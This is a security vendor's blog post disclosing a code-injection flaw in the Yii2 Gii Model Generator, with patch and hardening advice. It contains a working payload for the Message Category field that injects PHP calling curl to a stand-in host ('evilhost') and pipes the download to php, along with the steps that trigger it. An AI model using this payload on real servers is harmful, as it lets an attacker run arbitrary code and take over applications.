This article is written specifically for web developers who use a module. We will tell you how we got access to sensitive data on a staging server through Yii2 Gii Remote Code: First to the testing environment, and then to the production. Spoiler: We have notified the module developer about the problem and it will be fixed soon. A temporary patch is available on GitHub.

Ā 

Gii is a module used to automatically generate code that implements some common website features: https://yiiframework.com.ua/ru/doc/guide/2/start-gii/

Ā 

Let's get started.

Ā 

The packages we use:Ā 

"yiisoft/yii2-debug": "~2.1.0",
       "yiisoft/yii2-gii": "^2.2",
       "yiisoft/yii2-faker": "~2.0.0",

Yii2 Framework 2.0.35

Ā 

You can find Gii at the addresses like:

https://localhost/index.php?r=gii%2Fdefault%2Findex
https://localhost/gii/

To successfully exploit the vulnerability, go to the Model Generator section.

The application must have a database configured, otherwise the model cannot be generated.Ā 

Also, you must specify the existing table name in the Table Name field.Ā 

The remaining fields can be filled arbitrarily up to the Enable I18N checkbox.

Once you select it, the Message Category field appears.

That's exactly where the vulnerability is hidden:

aaa', 'a'),];}}system('curl https://evilhost/b|php');__halt_compiler();

Click Preview, then click Generate. The answer should be:

The code has been generated successfully.

And next there will be data on successful generation, including a path to the model.

The vulnerability exists due to insufficient filtering of incoming parameters in the generateString function of the yiisoft/yii2-gii/src/Generator.php#L505 file. The $ this->messageCategory parameter is not filtered and allows you to embed arbitrary php code into the model file.

Here is an example file with embedded php code:

To execute arbitrary code, you need to enter the created model it in the Model Class field of the Form Generator section. This vulnerability can be exploited in any type of code generation with the Enable I18N option available.

Since the vulnerability still exists, those who use the Yii2 Gii Remote Code module need to check the following:

  1. Make sure that access to the developer's platform is closed: There should be no alpha/beta or other versions, and the development environment should not be open to external access.
  2. To patch the vulnerability, you should use the recommendations described by the module“s developer here https://github.com/yiisoft/yii2-gii/issues/433.
  3. Furthermore, we encourage you to install the Web Application Firewall which will fix such vulnerabilities and ensure the security of your web applications.

We would also like to note that developers should not underestimate access to their staging server, as it can help attackers gain access to their resources.

Start your Wallarm WAF trial for free today: sales@wallarm.ru

Recent Posts

Extending Security to MCP Servers: Closing a Critical Gap

The Model Context Protocol (MCP) is a de facto standard for providing structured access to…

3 days ago

Introducing Wallarm Middle East Cloud: Built for Data Residency Compliance

As API and AI adoption grows across the Middle East, so do the expectations around…

2 weeks ago

6 Lessons Security Leaders Must Learn About AI and APIs

Most organizations treating AI security as a model problem are defending the wrong layer. Security…

2 weeks ago

The Governance Gap: How the EU AI Act Makes API Security a Compliance Imperative

Your legal team just handed you a 400-page document and said "figure out compliance." The…

3 weeks ago

Attacking the MCP Trust Boundary

Every secure API draws a line between code and data. HTTP separates headers from bodies.…

3 weeks ago

Why API Discovery Is the First Step to Securing AI

TL;DR AI risk doesn’t live in the model. It lives in the APIs behind it.…

3 weeks ago